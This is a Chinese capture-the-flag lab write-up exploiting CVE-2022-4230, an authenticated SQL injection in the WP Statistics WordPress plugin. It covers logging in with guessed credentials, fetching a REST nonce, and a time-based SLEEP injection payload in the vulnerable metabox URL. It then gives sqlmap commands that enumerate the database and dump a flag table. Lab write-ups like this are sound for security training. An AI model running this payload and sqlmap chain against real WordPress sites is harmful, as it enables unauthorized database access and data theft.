春秋云境 | SQL | CVE-2022-4230

目录

靶标介绍

开启靶场

wpscan漏洞介绍

查询数据库表名

查询表中字段名

查询字段下数据

---

靶标介绍

WP Statistics WordPress 插件13.2.9之前的版本不会转义参数，这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下，具有管理选项功能 (admin+) 的用户可以使用受影响的功能，但是该插件有一个设置允许低权限用户也可以访问它。

开启靶场

开启靶场之后，发现什么都没有，所以我们进行目录扫描，这里我使用的是御剑目录扫描工具

访问 license.txt 无收获，访问 resdme.html 发现以下页面

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/readme.html

点击 login page，发现了一个登录页面

试了用户名和密码是 admin 之后并无发现，左下角有一个“返回到 test”，说明 test 大概率是用户，尝试登录一下

发现登录成功了

wpscan漏洞介绍

根据靶标介绍，这里有插件漏洞，链接：WP Statistics < 13.2.9 – 经过身份验证的 SQLi |CVE 2022-4230 |插件漏洞 (wpscan.com)，有兴趣可以了解下

意思大概是这样的：以允许查看WP统计信息的用户身份登录，并通过获取随机数“https://xxx.com/wp-admin/admin-ajax.php?action=rest-nonce”，并在下面的URL中使用它，该URL将延迟5s

首先通过访问，获得随机数（必须要先登录过后台才行）

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=rest-nonce

获得随机数之后，把随机数添加到下面那个 URL 中，访问一下试试，这里就不加“%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR”了，不加这条语句不影响最终结果

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce=16139d290f&name=words&search_engine=aaa

访问之后发现了这个页面，然后用 Burp 抓个包吧

把数据包复制到一个文本里，重命名为 test.txt 拖进 kali 桌面，在桌面打开终端使用 sqlmap 工具跑一下

sqlmap -r test.txt --batch --dbs

发现了 wordpress 敏感数据库

查询数据库表名

sqlmap -r test.txt --batch -D wordpress --tables

发现了一个 flag 表

查询表中字段名

sqlmap -r test.txt --batch -D wordpress -T flag --columns

发现字段名是 flag

查询字段下数据

sqlmap -r test.txt --batch -D wordpress -T flag -C flag --dump

发现了 flag